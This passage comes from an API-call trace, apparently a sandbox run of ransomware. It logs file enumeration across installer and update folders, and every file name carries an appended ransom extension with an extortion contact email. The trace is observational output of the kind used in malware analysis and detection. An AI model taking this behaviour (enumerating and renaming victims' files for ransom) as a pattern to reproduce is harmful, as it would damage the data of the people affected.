ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Print.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PRINTI~1.BAT")) returned 1 [0156.445] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda77999, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda77999, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda77999, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate1.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~1.BAT")) returned 1 [0156.445] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda77999, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda77999, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda9d258, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate2.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~2.BAT")) returned 1 [0156.445] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfda9d258, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfda9d258, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda9d258, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate3.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~3.BAT")) returned 1 [0156.445] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb0f91e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb0f91e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb0f91e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate4.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROTATE~4.BAT")) returned 1 [0156.445] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb0f91e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb0f91e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb35ae9, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate5.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROB7C7~1.BAT")) returned 1 [0156.446] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdb5be49, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdb5be49, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdb5be49, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate6.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROA446~1.BAT")) returned 1 [0156.446] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdbce539, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdbce539, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdbce539, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate7.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="ROEED7~1.BAT")) returned 1 [0156.446] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdbf4763, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdbf4763, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc1aa71, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x46a, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Rotate8.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="RO434F~1.BAT")) returned 1 [0156.446] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc1aa71, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc1aa71, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdc40cc8, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x564, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Save.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SAVEIC~1.BAT")) returned 1 [0156.446] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdc40cc8, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdc40cc8, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe046b78, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x9056, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="Setup.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPI~1.BAT")) returned 1 [0156.446] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdfae1c2, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdfae1c2, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdfae1c2, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="stop.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="STOPIC~1.BAT")) returned 1 [0156.447] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe06cda5, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe06cda5, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe06cda5, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SysReqMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SYSREQ~2.BAT")) returned 1 [0156.447] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfdfd443d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfdfd443d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe911666, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x574, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="SysReqNotMet.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SYSREQ~1.BAT")) returned 1 [0156.447] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe046b78, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe046b78, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe0b9361, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WARNIC~1.BAT")) returned 1 [0156.447] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe046b78, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe046b78, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe0b9361, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2884, dwReserved0=0xffffddfe, dwReserved1=0x5f0, cFileName="warn.ico.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WARNIC~1.BAT")) returned 0 [0156.447] FindClose (in: hFindFile=0x727e08 | out: hFindFile=0x727e08) returned 1 [0156.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44e0058 | out: hHeap=0x6a0000) returned 1 [0156.448] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfed69f3e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf18, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="header.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="HEADER~1.BAT")) returned 1 [0156.448] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x3b18abd, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0xadd3953, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="netfx_Core.mzz.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~1.BAT")) returned 1 [0156.448] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x2f7922a, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x290310, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="netfx_Core_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~2.BAT")) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe0df4ba, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe0df4ba, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xff0b1533, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x11c108, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="netfx_Core_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~3.BAT")) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x7d6e19f, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x29e23d7, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="netfx_Extended.mzz.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NETFX_~4.BAT")) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2570d26, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2570d26, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2655bca, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0xd5110, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="netfx_Extended_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NE9213~1.BAT")) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2ad9a55, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2ad9a55, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2af20fc, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x79110, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="netfx_Extended_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="NEE644~1.BAT")) returned 1 [0156.449] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe151ad2, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x427a6, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="ParameterInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="PARAME~1.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2daf62d, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2daf62d, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2daf62d, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2d304, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="RGB9RAST_x64.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="RGB9RA~1.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2dd5868, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2dd5868, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x305e031, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x17304, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="RGB9Rast_x86.msi.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="RGB9RA~2.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2f7922a, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2f7922a, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2f7922a, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x13236, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Setup.exe.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPE~1.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2f9f4c4, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x2f9f4c4, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x2fc56bf, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0xc5252, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="SetupEngine.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPE~2.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x30842a8, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x30842a8, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3168ff0, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x4824a, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="SetupUi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPU~2.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe09300d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x769a, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="SetupUi.xsd.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPU~1.BAT")) returned 1 [0156.450] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x31900f4, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x31900f4, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x36a0235, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x17854, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="SetupUtility.exe.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPU~3.BAT")) returned 1 [0156.451] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe020920, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe020920, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe8f05bb, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xa174, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="SplashScreen.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SPLASH~1.BAT")) returned 1 [0156.451] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x35e17c0, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x35e17c0, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x35e17c0, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x23518, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="sqmapi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SQMAPI~1.BAT")) returned 1 [0156.451] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe0b9361, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe0b9361, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfe9377b6, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x37fa, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Strings.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="STRING~1.BAT")) returned 1 [0156.451] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe177ed2, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe177ed2, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfece51f1, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x98e8, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="UiInfo.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="UIINFO~1.BAT")) returned 1 [0156.451] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfe911666, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfe911666, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0x1559793, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1977e, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="watermark.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WATERM~1.BAT")) returned 1 [0156.451] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x4c1b695, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x5b5241, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~1.BAT")) returned 1 [0156.452] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x4480692, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2d764e, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows6.0-KB956250-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~2.BAT")) returned 1 [0156.452] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x57e0ef0, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x59b2fc, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows6.1-KB958488-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~3.BAT")) returned 1 [0156.452] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x55a4d68, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~4.BAT")) returned 1 [0156.452] FindNextFileW (in: hFindFile=0x6ba1b0, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0x55a4d68, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x2cae27, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Windows6.1-KB958488-v6001-x86.msu.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WINDOW~4.BAT")) returned 0 [0156.452] FindClose (in: hFindFile=0x6ba1b0 | out: hFindFile=0x6ba1b0) returned 1 [0156.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.148] FindNextFileW (in: 